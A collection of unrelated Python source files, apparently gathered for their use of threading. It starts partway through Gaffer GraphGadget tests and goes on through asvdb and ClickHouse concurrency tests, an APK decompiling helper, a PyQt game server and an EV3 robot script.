g = GafferUI.GraphGadget( script )
self.assertTrue( g.nodeGadget( script["n"] ).nodule( script["n"]["out"] ) is None )
self.assertTrue( g.connectionGadget( script["n"]["out"] ) is None )
Gaffer.Metadata.registerValue( script["n"]["out"], "nodule:type", "GafferUI::StandardNodule" )
self.assertTrue( g.nodeGadget( script["n"] ).nodule( script["n"]["out"] ) is not None )
self.assertTrue( g.connectionGadget( script["n"]["out"] ) is None )
def testAddNoduleWithOutputConnection( self ) :
script = Gaffer.ScriptNode()
script["n1"] = Gaffer.Node()
script["n1"]["out"] = Gaffer.Plug( direction = Gaffer.Plug.Direction.Out )
script["n2"] = Gaffer.Node()
script["n2"]["in"] = Gaffer.Plug()
script["n2"]["in"].setInput( script["n1"]["out"] )
Gaffer.Metadata.registerValue( script["n1"]["out"], "nodule:type", "" )
g = GafferUI.GraphGadget( script )
self.assertTrue( g.nodeGadget( script["n1"] ).nodule( script["n1"]["out"] ) is None )
self.assertTrue( g.connectionGadget( script["n2"]["in"] ) is not None )
self.assertTrue( g.connectionGadget( script["n2"]["in"] ).srcNodule() is None )
Gaffer.Metadata.registerValue( script["n1"]["out"], "nodule:type", "GafferUI::StandardNodule" )
self.assertTrue( g.nodeGadget( script["n1"] ).nodule( script["n1"]["out"] ) is not None )
self.assertTrue( g.connectionGadget( script["n2"]["in"] ) is not None )
self.assertTrue( g.connectionGadget( script["n2"]["in"] ).srcNodule() is not None )
def testRemoveNonNodulePlug( self ) :
s = Gaffer.ScriptNode()
s["n"] = Gaffer.Node()
s["n"]["p"] = Gaffer.Plug()
Gaffer.Metadata.registerValue( s["n"]["p"], "nodule:type", "" )
g = GafferUI.GraphGadget( s )
self.assertTrue( g.nodeGadget( s["n"] ).nodule( s["n"]["p"] ) is None )
# Once upon a time, this would crash.
del s["n"]["p"]
def testEnabledException( self ) :
s = Gaffer.ScriptNode()
s["n"] = GafferTest.AddNode()
s["e"] = Gaffer.Expression()
s["e"].setExpression( "parent['n']['enabled'] = undefinedVariable" )
g = GafferUI.GraphGadget( s )
self.assertTrue( g.nodeGadget( s["n"] ) is not None )
def testLayoutAccessors( self ) :
s = Gaffer.ScriptNode()
g = GafferUI.GraphGadget( s )
l = g.getLayout()
self.assertTrue( isinstance( l, GafferUI.StandardGraphLayout ) )
l2 = GafferUI.StandardGraphLayout()
g.setLayout( l2 )
self.assertTrue( g.getLayout().isSame( l2 ) )
g.setLayout( l )
self.assertTrue( g.getLayout().isSame( l ) )
def testUnpositionedNodeGadgets( self ) :
s = Gaffer.ScriptNode()
g = GafferUI.GraphGadget( s )
s["n"] = Gaffer.Node()
self.assertEqual( g.unpositionedNodeGadgets(), [ g.nodeGadget( s["n"] ) ] )
g.setNodePosition( s["n"], imath.V2f( 0 ) )
self.assertEqual( g.unpositionedNodeGadgets(), [] )
def testInputConnectionMaintainedOnNoduleMove( self ) :
s = Gaffer.ScriptNode()
g = GafferUI.GraphGadget( s )
s["n1"] = GafferTest.AddNode()
s["n2"] = GafferTest.AddNode()
s["n2"]["op1"].setInput( s["n1"]["sum"] )
self.assertTrue( g.connectionGadget( s["n2"]["op1"] ) is not None )
for section in ( "top", "bottom", "top", "left", "right", "left", "bottom", "right" ) :
Gaffer.Metadata.registerValue( s["n2"]["op1"], "noduleLayout:section", section )
connection = g.connectionGadget( s["n2"]["op1"] )
self.assertTrue( connection is not None )
self.assertTrue( connection.srcNodule() is not None )
self.assertTrue( connection.srcNodule().isSame( g.nodeGadget( s["n1"] ).nodule( s["n1"]["sum"] ) ) )
self.assertTrue( connection.dstNodule().isSame( g.nodeGadget( s["n2"] ).nodule( s["n2"]["op1"] ) ) )
def testOutputConnectionMaintainedOnNoduleMove( self ) :
s = Gaffer.ScriptNode()
g = GafferUI.GraphGadget( s )
s["n1"] = GafferTest.AddNode()
s["n2"] = GafferTest.AddNode()
s["n2"]["op1"].setInput( s["n1"]["sum"] )
self.assertTrue( g.connectionGadget( s["n2"]["op1"] ) is not None )
for section in ( "top", "bottom", "top", "left", "right", "left", "bottom", "right" ) :
Gaffer.Metadata.registerValue( s["n1"]["sum"], "noduleLayout:section", section )
connection = g.connectionGadget( s["n2"]["op1"] )
self.assertTrue( connection is not None )
self.assertTrue( connection.srcNodule() is not None )
self.assertTrue( connection.srcNodule().isSame( g.nodeGadget( s["n1"] ).nodule( s["n1"]["sum"] ) ) )
self.assertTrue( connection.dstNodule().isSame( g.nodeGadget( s["n2"] ).nodule( s["n2"]["op1"] ) ) )
def testInputConnectionMaintainedOnNestedNoduleMove( self ) :
s = Gaffer.ScriptNode()
g = GafferUI.GraphGadget( s )
s["n1"] = GafferTest.AddNode()
s["n2"] = GafferTest.ArrayPlugNode()
Gaffer.Metadata.registerValue( s["n2"]["in"], "nodule:type", "GafferUI::CompoundNodule" )
s["n2"]["in"][0].setInput( s["n1"]["sum"] )
self.assertTrue( g.connectionGadget( s["n2"]["in"][0] ) is not None )
for section in ( "top", "bottom", "top", "left", "right", "left", "bottom", "right" ) :
Gaffer.Metadata.registerValue( s["n2"]["in"], "noduleLayout:section", section )
connection = g.connectionGadget( s["n2"]["in"][0] )
self.assertTrue( connection is not None )
self.assertTrue( connection.srcNodule() is not None )
self.assertTrue( connection.srcNodule().isSame( g.nodeGadget( s["n1"] ).nodule( s["n1"]["sum"] ) ) )
self.assertTrue( connection.dstNodule().isSame( g.nodeGadget( s["n2"] ).nodule( s["n2"]["in"][0] ) ) )
def testNodeGadgetMetadataChanges( self ) :
s = Gaffer.ScriptNode()
g = GafferUI.GraphGadget( s )
s["n1"] = GafferTest.AddNode()
s["n2"] = GafferTest.AddNode()
s["n2"]["op1"].setInput( s["n1"]["sum"] )
def assertBothVisible() :
ng1 = g.nodeGadget( s["n1"] )
ng2 = g.nodeGadget( s["n2"] )
c = g.connectionGadget( s["n2"]["op1"] )
self.assertTrue( isinstance( ng1, GafferUI.StandardNodeGadget ) )
self.assertTrue( isinstance( ng2, GafferUI.StandardNodeGadget ) )
self.assertTrue( isinstance( c, GafferUI.StandardConnectionGadget ) )
self.assertTrue( c.srcNodule().isSame( ng1.nodule( s["n1"]["sum"] ) ) )
self.assertTrue( c.dstNodule().isSame( ng2.nodule( s["n2"]["op1"] ) ) )
assertBothVisible()
Gaffer.Metadata.registerValue( s["n1"], "nodeGadget:type", "" )
def assertN1Hidden() :
ng1 = g.nodeGadget( s["n1"] )
ng2 = g.nodeGadget( s["n2"] )
c = g.connectionGadget( s["n2"]["op1"] )
self.assertTrue( ng1 is None )
self.assertTrue( isinstance( ng2, GafferUI.StandardNodeGadget ) )
self.assertTrue( isinstance( c, GafferUI.StandardConnectionGadget ) )
self.assertTrue( c.srcNodule() is None )
self.assertTrue( c.dstNodule().isSame( ng2.nodule( s["n2"]["op1"] ) ) )
assertN1Hidden()
Gaffer.Metadata.registerValue( s["n2"], "nodeGadget:type", "" )
def assertBothHidden() :
self.assertTrue( g.nodeGadget( s["n1"] ) is None )
self.assertTrue( g.nodeGadget( s["n2"] ) is None )
self.assertTrue( g.connectionGadget( s["n2"]["op1"] ) is None )
assertBothHidden()
Gaffer.Metadata.registerValue( s["n2"], "nodeGadget:type", "GafferUI::StandardNodeGadget" )
assertN1Hidden()
Gaffer.Metadata.registerValue( s["n1"], "nodeGadget:type", "GafferUI::StandardNodeGadget" )
assertBothVisible()
def testConnectionGadgetsIncludesDanglingConnections( self ) :
s = Gaffer.ScriptNode()
s["n1"] = Gaffer.Node()
s["n1"]["c"] = Gaffer.Color3fPlug( direction = Gaffer.Plug.Direction.Out, flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )
s["n2"] = Gaffer.Node()
s["n2"]["c"] = Gaffer.Color3fPlug( flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )
s["n2"]["c"]["r"].setInput( s["n1"]["c"]["r"] )
Gaffer.Metadata.registerValue( s["n2"]["c"], "compoundNumericNodule:childrenVisible", True )
g = GafferUI.GraphGadget( s )
c = g.connectionGadgets( s["n2"]["c"]["r"] )
self.assertEqual( len( c ), 1 )
self.assertEqual( c[0].dstNodule(), g.nodeGadget( s["n2"] ).nodule( s["n2"]["c"]["r"] ) )
self.assertIsNone( c[0].srcNodule() )
def testChangeNodeGadgetForUnviewedNode( self ) :
s = Gaffer.ScriptNode()
s["b"] = Gaffer.Box()
s["b"]["n"] = Gaffer.Node()
g = GafferUI.GraphGadget( s )
self.assertIsNotNone( g.nodeGadget( s["b"] ) )
self.assertIsNone( g.nodeGadget( s["b"]["n"] ) )
Gaffer.Metadata.registerValue( s["b"]["n"], "nodeGadget:type", "GafferUI::AuxiliaryNodeGadget" )
self.assertIsNone( g.nodeGadget( s["b"]["n"] ) )
if __name__ == "__main__":
unittest.main()
|
test_stress.py | #!/usr/bin/python
from __future__ import absolute_import, print_function, unicode_literals
from optparse import OptionParser, make_option
import dbus
import time
import dbus.mainloop.glib
import bleAdapter
try:
from gi.repository import GObject
except ImportError:
import gobject as GObject
import testutils
import startTests_stress as startTests
import threading
import securityAgent
devices = {}
def backGroundEvents():
try:
mainloop = GObject.MainLoop()
mainloop.run()
except KeyboardInterrupt:
mainloop.quit()
print("Thread: KeyboardInterrupt")
return
if __name__ == '__main__':
dbus.mainloop.glib.DBusGMainLoop(set_as_default=True)
testutils.removeBondedDevices()
#startBackGroundEvents = threading.Thread(target=backGroundEvents)
#startBackGroundEvents.start()
startTests.main()
|
test_asvdb.py | from os import path
import tempfile
import json
import threading
import time
import pytest
datasetName = "dolphins.csv"
algoRunResults = [('loadDataFile', 3.2228727098554373),
('createGraph', 3.00713360495865345),
('pagerank', 3.00899268127977848),
('bfs', 3.004273353144526482),
('sssp', 3.004624705761671066),
('jaccard', 3.0025573652237653732),
('louvain', 3.32631026208400726),
('weakly_connected_components', 3.0034315641969442368),
('overlap', 3.002147899940609932),
('triangles', 3.2544921860098839),
('spectralBalancedCutClustering', 3.03329935669898987),
('spectralModularityMaximizationClustering', 3.011258183047175407),
('renumber', 3.001620553433895111),
('view_adj_list', 3.000927431508898735),
('degree', 3.0016251634806394577),
('degrees', None)]
repo = "myrepo"
branch = "my_branch"
commitHash = "809a1569e8a2ff138cdde4d9c282328be9dcad43"
commitTime = 1590007324
machineName = "my_machine"
def createAndPopulateASVDb(dbDir):
from asvdb import ASVDb, BenchmarkInfo
db = ASVDb(dbDir, repo, [branch])
bInfo = BenchmarkInfo(machineName=machineName,
cudaVer="9.2",
osType="linux",
pythonVer="3.6",
commitHash=commitHash,
commitTime=commitTime,
branch=branch,
gpuType="n/a",
cpuType="x86_64",
arch="my_arch",
ram="123456")
return addResultsForInfo(db, bInfo)
def addResultsForInfo(db, bInfo):
from asvdb import ASVDb, BenchmarkResult
for (algoName, exeTime) in algoRunResults:
bResult = BenchmarkResult(funcName=algoName,
argNameValuePairs=[("dataset", datasetName)],
result=exeTime)
db.addResult(bInfo, bResult)
return db
def test_addResult():
asvDir = tempfile.TemporaryDirectory()
db = createAndPopulateASVDb(asvDir.name)
asvDir.cleanup()
def test_addResults():
asvDir = tempfile.TemporaryDirectory()
from asvdb import ASVDb, BenchmarkInfo, BenchmarkResult
dbDir = asvDir.name
db = ASVDb(dbDir, repo, [branch])
bInfo = BenchmarkInfo(machineName=machineName,
cudaVer="9.2",
osType="linux",
pythonVer="3.6",
commitHash=commitHash,
commitTime=commitTime,
branch=branch,
gpuType="n/a",
cpuType="x86_64",
arch="my_arch",
ram="123456")
resultList = []
for (algoName, exeTime) in algoRunResults:
bResult = BenchmarkResult(funcName=algoName,
argNameValuePairs=[("dataset", datasetName)],
result=exeTime)
resultList.append(bResult)
db.addResults(bInfo, resultList)
# read back in and check
dbCheck = ASVDb(dbDir, repo, [branch])
retList = dbCheck.getResults()
assert len(retList) == 1
assert retList[0][0] == bInfo
assert len(retList[0][1]) == len(algoRunResults)
assert resultList == retList[0][1]
asvDir.cleanup()
def test_writeWithoutRepoSet():
from asvdb import ASVDb
tmpDir = tempfile.TemporaryDirectory()
asvDirName = path.join(tmpDir.name, "dir_that_does_not_exist")
db1 = ASVDb(asvDirName)
with pytest.raises(AttributeError):
db1.updateConfFile()
def test_asvDirDNE():
from asvdb import ASVDb
tmpDir = tempfile.TemporaryDirectory()
asvDirName = path.join(tmpDir.name, "dir_that_does_not_exist")
repo = "somerepo"
branch1 = "branch1"
db1 = ASVDb(asvDirName, repo, [branch1])
db1.updateConfFile()
confFile = path.join(asvDirName, "asv.conf.json")
with open(confFile) as fobj:
j = json.load(fobj)
branches = j["branches"]
assert branches == [branch1]
tmpDir.cleanup()
def test_newBranch():
from asvdb import ASVDb
asvDir = tempfile.TemporaryDirectory()
repo = "somerepo"
branch1 = "branch1"
branch2 = "branch2"
db1 = ASVDb(asvDir.name, repo, [branch1])
db1.updateConfFile()
db2 = ASVDb(asvDir.name, repo, [branch2])
db2.updateConfFile()
confFile = path.join(asvDir.name, "asv.conf.json")
with open(confFile) as fobj:
j = json.load(fobj)
branches = j["branches"]
assert branches == [branch1, branch2]
asvDir.cleanup()
def test_gitExtension():
from asvdb import ASVDb
asvDir = tempfile.TemporaryDirectory()
repo = "somerepo"
branch1 = "branch1"
db1 = ASVDb(asvDir.name, repo, [branch1])
db1.updateConfFile()
confFile = path.join(asvDir.name, "asv.conf.json")
with open(confFile) as fobj:
j = json.load(fobj)
repo = j["repo"]
assert repo.endswith(".git")
asvDir.cleanup()
def test_concurrency():
from asvdb import ASVDb, BenchmarkInfo, BenchmarkResult
tmpDir = tempfile.TemporaryDirectory()
asvDirName = path.join(tmpDir.name, "dir_that_does_not_exist")
repo = "somerepo"
branch1 = "branch1"
db1 = ASVDb(asvDirName, repo, [branch1])
db2 = ASVDb(asvDirName, repo, [branch1])
db3 = ASVDb(asvDirName, repo, [branch1])
# Use the writeDelay member var to insert a delay during write to properly
# test collisions by making writes slow.
db1.writeDelay = 10
db2.writeDelay = 10
bInfo = BenchmarkInfo()
bResult1 = BenchmarkResult(funcName="somebenchmark1", result=43)
bResult2 = BenchmarkResult(funcName="somebenchmark2", result=43)
bResult3 = BenchmarkResult(funcName="somebenchmark3", result=43)
# db1 or db2 should be actively writing the result (because the writeDelay is long)
# and db3 should be blocked.
t1 = threading.Thread(target=db1.addResult, args=(bInfo, bResult1))
t2 = threading.Thread(target=db2.addResult, args=(bInfo, bResult2))
t3 = threading.Thread(target=db3.addResult, args=(bInfo, bResult3))
t1.start()
t2.start()
time.sleep(0.5) # ensure t3 tries to write last
t3.start()
# Check that db3 is blocked - if locking wasn't working, it would have
# finished since it has no writeDelay.
t3.join(timeout=0.5)
assert t3.is_alive() is True
# Cancel db1 and db2, allowing db3 to write and finish
db1.cancelWrite = True
db2.cancelWrite = True
t3.join(timeout=11)
assert t3.is_alive() is False
t1.join()
t2.join()
t3.join()
# Check that db3 wrote its result
with open(path.join(asvDirName, "results", "benchmarks.json")) as fobj:
jo = json.load(fobj)
assert "somebenchmark3" in jo
#print(jo)
tmpDir.cleanup()
def test_concurrency_stress():
from asvdb import ASVDb, BenchmarkInfo, BenchmarkResult
tmpDir = tempfile.TemporaryDirectory()
asvDirName = path.join(tmpDir.name, "dir_that_does_not_exist")
repo = "somerepo"
branch1 = "branch1"
num = 32
dbs = []
threads = []
allFuncNames = []
bInfo = BenchmarkInfo(machineName=machineName)
for i in range(num):
db = ASVDb(asvDirName, repo, [branch1])
db.writeDelay=0.5
dbs.append(db)
funcName = f"somebenchmark{i}"
bResult = BenchmarkResult(funcName=funcName, result=43)
allFuncNames.append(funcName)
t = threading.Thread(target=db.addResult, args=(bInfo, bResult))
threads.append(t)
for i in range(num):
threads[i].start()
for i in range(num):
threads[i].join()
# There should be num unique results in the db after (re)reading. Pick any
# of the db instances to read, they should all see the same results.
results = dbs[0].getResults()
assert len(results[0][1]) == num
# Simply check that all unique func names were read back in.
allFuncNamesCheck = [r.funcName for r in results[0][1]]
assert sorted(allFuncNames) == sorted(allFuncNamesCheck)
tmpDir.cleanup()
def test_read():
from asvdb import ASVDb
tmpDir = tempfile.TemporaryDirectory()
asvDirName = path.join(tmpDir.name, "dir_that_did_not_exist_before")
createAndPopulateASVDb(asvDirName)
db1 = ASVDb(asvDirName)
db1.loadConfFile()
# asvdb always ensures repos end in .git
assert db1.repo == f"{repo}.git"
assert db1.branches == [branch]
# getInfo() returns a list of BenchmarkInfo objs
biList = db1.getInfo()
assert len(biList) == 1
bi = biList[0]
assert bi.machineName == machineName
assert bi.commitHash == commitHash
assert bi.commitTime == commitTime
assert bi.branch == branch
# getResults() returns a list of tuples:
# (BenchmarkInfo obj, [BenchmarkResult obj, ...])
brList = db1.getResults()
assert len(brList) == len(biList)
assert brList[0][0] == bi
results = brList[0][1]
assert len(results) == len(algoRunResults)
br = results[0]
assert br.funcName == algoRunResults[0][0]
assert br.argNameValuePairs == [("dataset", datasetName)]
assert br.result == algoRunResults[0][1]
def test_getFilteredResults():
from asvdb import ASVDb, BenchmarkInfo
tmpDir = tempfile.TemporaryDirectory()
asvDirName = path.join(tmpDir.name, "dir_that_did_not_exist_before")
db = ASVDb(asvDirName, repo, [branch])
bInfo1 = BenchmarkInfo(machineName=machineName,
cudaVer="9.2",
osType="linux",
pythonVer="3.6",
commitHash=commitHash,
commitTime=commitTime)
bInfo2 = BenchmarkInfo(machineName=machineName,
cudaVer="10.1",
osType="linux",
pythonVer="3.7",
commitHash=commitHash,
commitTime=commitTime)
bInfo3 = BenchmarkInfo(machineName=machineName,
cudaVer="10.0",
osType="linux",
pythonVer="3.7",
commitHash=commitHash,
commitTime=commitTime)
addResultsForInfo(db, bInfo1)
addResultsForInfo(db, bInfo2)
addResultsForInfo(db, bInfo3)
# should only return results associated with bInfo1
brList1 = db.getResults(filterInfoObjList=[bInfo1])
assert len(brList1) == 1
assert brList1[0][0] == bInfo1
assert len(brList1[0][1]) == len(algoRunResults)
# should only return results associated with bInfo1 or bInfo3
brList1 = db.getResults(filterInfoObjList=[bInfo1, bInfo3])
assert len(brList1) == 2
assert brList1[0][0] in [bInfo1, bInfo3]
assert brList1[1][0] in [bInfo1, bInfo3]
assert brList1[0][0] != brList1[1][0]
assert len(brList1[0][1]) == len(algoRunResults)
assert len(brList1[1][1]) == len(algoRunResults)
|
test.py | import time
import threading
import random
from collections import Counter
import pytest
from helpers.cluster import ClickHouseCluster
cluster = ClickHouseCluster(__file__)
node1 = cluster.add_instance('node1', with_zookeeper=True)
node2 = cluster.add_instance('node2', with_zookeeper=True)
nodes = [node1, node2]
@pytest.fixture(scope="module")
def started_cluster():
try:
cluster.start()
for node in nodes:
node.query("DROP TABLE IF EXISTS test_mutations")
for node in nodes:
node.query("CREATE TABLE test_mutations(d Date, x UInt32, i UInt32) ENGINE ReplicatedMergeTree('/clickhouse/tables/test/test_mutations', '{instance}') ORDER BY x PARTITION BY toYYYYMM(d)")
yield cluster
finally:
cluster.shutdown()
class Runner:
def __init__(self):
self.mtx = threading.Lock()
self.total_inserted_xs = 0
self.total_inserted_rows = 0
self.total_mutations = 0
self.total_deleted_xs = 0
self.total_deleted_rows = 0
self.current_xs = Counter()
self.currently_inserting_xs = Counter()
self.currently_deleting_xs = set()
self.stop_ev = threading.Event()
def do_insert(self, thread_num):
self.stop_ev.wait(random.random())
# Each thread inserts a small random number of rows with random year, month 01 and day determined
# by the thread number. The idea is to avoid spurious duplicates and to insert into a
# nontrivial number of partitions.
month = '01'
day = str(thread_num + 1).zfill(2)
i = 1
while not self.stop_ev.is_set():
xs = [random.randint(1, 10) for _ in range(random.randint(1, 10))]
with self.mtx:
xs = [x for x in xs if x not in self.currently_deleting_xs]
if len(xs) == 0:
continue
for x in xs:
self.currently_inserting_xs[x] += 1
year = 2000 + random.randint(0, 10)
date_str = '{year}-{month}-{day}'.format(year=year, month=month, day=day)
payload = ''
for x in xs:
payload += '{date_str} {x} {i}\n'.format(date_str=date_str, x=x, i=i)
i += 1
try:
print 'thread {}: insert for {}: {}'.format(thread_num, date_str, ','.join(str(x) for x in xs))
random.choice(nodes).query("INSERT INTO test_mutations FORMAT TSV", payload)
with self.mtx:
for x in xs:
self.current_xs[x] += 1
self.total_inserted_xs += sum(xs)
self.total_inserted_rows += len(xs)
except Exception, e:
print 'Exception while inserting,', e
finally:
with self.mtx:
for x in xs:
self.currently_inserting_xs[x] -= 1
self.stop_ev.wait(0.2 + random.random() / 5)
def do_delete(self, thread_num):
self.stop_ev.wait(1.0 + random.random())
while not self.stop_ev.is_set():
chosen = False
with self.mtx:
if self.current_xs:
x = random.choice(list(self.current_xs.elements()))
if self.currently_inserting_xs[x] == 0 and x not in self.currently_deleting_xs:
chosen = True
self.currently_deleting_xs.add(x)
to_delete_count = self.current_xs[x]
if not chosen:
self.stop_ev.wait(0.1 * random.random())
continue
try:
print 'thread {}: delete {} * {}'.format(thread_num, to_delete_count, x)
random.choice(nodes).query("ALTER TABLE test_mutations DELETE WHERE x = {}".format(x))
with self.mtx:
self.total_mutations += 1
self.current_xs[x] -= to_delete_count
self.total_deleted_xs += to_delete_count * x
self.total_deleted_rows += to_delete_count
except Exception, e:
print 'Exception while deleting,', e
finally:
with self.mtx:
self.currently_deleting_xs.remove(x)
self.stop_ev.wait(1.0 + random.random() * 2)
def test_mutations(started_cluster):
DURATION_SECONDS = 50
runner = Runner()
threads = []
for thread_num in range(5):
threads.append(threading.Thread(target=runner.do_insert, args=(thread_num, )))
for thread_num in (11, 12, 13):
threads.append(threading.Thread(target=runner.do_delete, args=(thread_num,)))
for t in threads:
t.start()
time.sleep(DURATION_SECONDS)
runner.stop_ev.set()
for t in threads:
t.join()
# Sanity check: at least something was inserted and something was deleted
assert runner.total_inserted_rows > 0
assert runner.total_mutations > 0
all_done = False
for i in range(100): # wait for replication 10 seconds max
time.sleep(0.1)
def get_done_mutations(node):
return int(node.query("SELECT sum(is_done) FROM system.mutations WHERE table = 'test_mutations'").rstrip())
if all([get_done_mutations(n) == runner.total_mutations for n in nodes]):
all_done = True
break
print node1.query("SELECT mutation_id, command, parts_to_do, is_done FROM system.mutations WHERE table = 'test_mutations' FORMAT TSVWithNames")
assert all_done
expected_sum = runner.total_inserted_xs - runner.total_deleted_xs
actual_sums = []
for i, node in enumerate(nodes):
actual_sums.append(int(node.query("SELECT sum(x) FROM test_mutations").rstrip()))
assert actual_sums[i] == expected_sum
|
ApkParser.py | #!/usr/bin/env python
#-*-coding:utf-8-*-
import sys
import subprocess
import threading
import os
import shutil
import time
class Parser(object):
def __init__(self,path):
self.current_path = self.current_path()
self.output = self.current_path + "/output-" + str(time.time())
self.apk_path = path[1]
self.dex_to_jar_path = self.get_dex_to_jar_path()
self.apk_name = self.parseName(self.apk_path)
self.parent_path = os.path.dirname(self.apk_path)
self.process = None
def get_dex_to_jar_path(self):
with open(self.current_path + "/Config.py") as f:
return f.readlines()[3].split("=")[1].strip()
def current_path(self):
return os.path.normpath(os.path.join(os.getcwd(),os.path.dirname(__file__)))
def parseName(self,apk_path):
splittable = apk_path.split('/')
full_apk_name = splittable[len(splittable) - 1]
return full_apk_name.split('.')[0]
def copyApk(self):
shutil.move(self.apk_path, self.dex_to_jar_path)
def changeEnv(self):
os.chdir(self.dex_to_jar_path)
def decompile(self):
print '.....decompile started.....'
def doDecompile():
apktool_cmd = "apktool d " + self.apk_name + ".apk"
self.process = subprocess.Popen(apktool_cmd, shell=True)
self.process.communicate()
thread = threading.Thread(target=doDecompile)
thread.start()
thread.join()
print '.....decompile finished.....'
def recompile(self):
print '.....recompile started.....'
def doRecompile():
apktool_cmd = "apktool b " + self.apk_name
self.process = subprocess.Popen(apktool_cmd, shell=True)
self.process.communicate()
thread = threading.Thread(target=doRecompile)
thread.start()
thread.join()
print '.....recompile finished.....'
def dex_to_jar(self):
print '.....dex2jar started.....'
dest = self.apk_name + "/build/apk/"
for filename in os.listdir(dest):
if not filename.find("classes"):
def doDex_to_jar():
cmd = "./d2j-dex2jar.sh " + self.apk_name + "/build/apk/" + filename
self.process = subprocess.Popen(cmd, shell=True)
self.process.communicate()
thread = threading.Thread(target=doDex_to_jar)
thread.start()
thread.join()
print '.....dex2jar finished.....'
def createDir(self):
os.mkdir(self.output)
def restoreFile(self):
shutil.move(self.apk_name, self.output)
for dex in os.listdir(self.dex_to_jar_path):
if not dex.find("classes"):
shutil.move(dex, self.output)
def removeTempApk(self):
removalPath = self.dex_to_jar_path + "/" + self.apk_name + ".apk"
shutil.move(removalPath, self.apk_path)
def run(self):
self.copyApk()
self.changeEnv()
self.decompile()
self.recompile()
self.dex_to_jar()
self.createDir()
self.restoreFile()
self.removeTempApk()
def parse():
parser = Parser(sys.argv)
parser.run()
if __name__ == "__main__":
parse() |
Application_server.py | from PyQt5.QtWidgets import QApplication
from PyQt5.QtCore import pyqtSlot
from threading import Thread
from Classes import Server
import json
import time
class Application_server(QApplication):
def __init__(self, *agrs, **kwargs):
super(Application_server, self).__init__(*agrs, **kwargs)
self.server = None
@pyqtSlot(bool, int, int)
def game_over_response(self, value, player_id, place):
if value:
self.server.set_place_to_player(player_id, place)
print("GAME OVER ")
print(self.server.info_about_players)
self.server.send_info_to_client_game_over(self.server.info_about_players, player_id)
self.server.send_info_to_db(self.server.info_about_players)
answer = self.server.game_state.how_many_players_left()
print("players left ", answer)
if answer == 1:
id_winner = self.server.game_state.get_winner_id()
self.server.send_info_to_client_winner(self.server.info_about_players, id_winner)
def set_bomb_thread(self, addr, data):
# print("begin set bomb response")
player_id = self.server.get_player_id(addr)
answer = self.server.game_state.player_can_leave_bomb(player_id)
if answer is True:
self.server.add_bomb_to_player(player_id)
i, j = self.server.game_state.set_bomb(addr, data, player_id)
payload = {"type": "BOMB", "BOMB_POS": {"x": i, "y": j}, "whose_bomb": player_id}
for key, value in self.server.dict_players.items():
self.server.s.sendto(json.dumps(payload).encode("utf-8"), value)
time.sleep(2)
# wybuch bomby, od czasu otrzymania tego komunikatu od serwera klient efekty wybuchu
range_of_bomb = self.server.game_state.get_range_of_bomb(player_id)
self.server.game_state.count_where_blow(i, j, range_of_bomb)
# po wybuchu wyslanie info kto zginal
list_dead_players = self.server.game_state.handle_bombs(j, i, self.server.game_state.list_to_destroy)
if list_dead_players == []:
x_player, y_player = self.server.game_state.get_player_pos(player_id)
for i in self.server.game_state.list_to_destroy:
if i[0] == x_player and i[1] == y_player:
list_dead_players.append(player_id)
payload = {"type": "BOMB_BLOW", "BOMB_POS": {"x": i, "y": j},
"ELEMENTS_BLOW": self.server.game_state.list_to_destroy}
for key, value in self.server.dict_players.items():
self.server.s.sendto(json.dumps(payload).encode("utf-8"), value)
# odswiezenie swojego stanu gry
for k in self.server.game_state.list_to_destroy:
if self.server.game_state.game[k[1]][k[0]] != 0:
if self.server.game_state.game[k[1]][k[0]].desc == "bomb" or self.server.game_state.game[k[1]][
k[0]].desc == "brick":
self.server.game_state.game[k[1]][k[0]] = 0
elif self.server.game_state.game[k[1]][k[0]].desc == "powerup":
if self.server.game_state.game[k[1]][k[0]].view == "brick":
self.server.game_state.game[k[1]][k[0]].change_view("powerup")
else:
self.server.game_state.game[k[1]][k[0]] = 0
if list_dead_players != []:
self.server.game_state.game_over.emit(True, player_id, self.server.game_state.place)
self.server.game_state.place -= 1
dictionary_dead_players = {}
for k in list_dead_players:
dictionary_dead_players[k] = self.server.game_state.get_player_pos(k)
payload = {"type": "PLAYER_DEAD", "PLAYERS_POS": dictionary_dead_players}
for key, value in self.server.dict_players.items():
self.server.s.sendto(json.dumps(payload).encode("utf-8"), value)
print("dictionary_dead_players ", dictionary_dead_players)
self.server.game_state.remove_player_from_map(dictionary_dead_players)
print("Usunieto gracza z planszy ")
answer = self.server.game_state.how_many_players_left()
print(answer)
if answer == 1:
id_winner = self.server.game_state.get_winner_id()
self.server.send_info_to_client_winner(self.server.info_about_players, id_winner)
# print("end set bomb response")
@pyqtSlot(bool, tuple, str)
def set_bomb_response(self, value, addr, data):
if value:
thread = Thread(target=self.set_bomb_thread, args=[addr, data,])
thread.start()
def setup(self):
self.setup_server()
self.server.connectWithClient()
thread = Thread(target=self.server.listening, args=[])
thread.start()
def setup_server(self):
server = Server.Server()
self.server = server
|
Main_plaza-volta.py | #!/usr/bin/env python3
#FUNÇÂO PARA TESTE DO PLAZA E VOLTA(ATÉ ACHAR UM BONECO OU CHEGAR NO FINAL DA PISTA)
#SUBSTITUIR OS VALORES NOS LOCAIS INDICADOS
print("Inicializando...", end=' \r')
import time
# from ev3dev.ev3 import *
print("ev3dev.ev3", end=' \r')
from ev3dev2.motor import OUTPUT_A, OUTPUT_B,OUTPUT_C, MoveTank, SpeedPercent, LargeMotor
print("motores importados", end=' \r')
from ev3dev2.sensor.lego import ColorSensor,UltrasonicSensor
from ev3dev2.sensor import INPUT_4, INPUT_2, INPUT_3
print("Sensores importados", end=' \r')
from threading import Thread
from math import sqrt
import pickle
print("threading, math e pickle importados", end=' \r')
time.sleep(1)
print("Importacoes concluidas!", end=' \r')
#DECLARAÇÃO DE VARIAVEIS GLOBAIS
rodas=MoveTank(OUTPUT_A,OUTPUT_B)
Mochila=LargeMotor(OUTPUT_C)
quads = []
orientacao = 0
# memoria_cor= {}
memoria_cor = {'Red':0,
'Yellow':-90,
'Green':90,}#SUBSTITUIR AQUI AS DIREÇÔES (90 é direita e -90 esquerda, 0 é Frente)
plaza=False
cor_atual=""
tentativa=0
c=""
mochila=False
velocidade=20
cores = pickle.load(open("Cores.p", "rb"))
Sensor_direita = ColorSensor(INPUT_2)
Sensor_esquerda = ColorSensor(INPUT_4)
Sensor_direita.mode = Sensor_direita.MODE_RGB_RAW
Sensor_esquerda.mode = Sensor_esquerda.MODE_RGB_RAW
Sensor_sonic = UltrasonicSensor(INPUT_3)
Sensor_sonic.mode=Sensor_sonic.MODE_US_DIST_CM
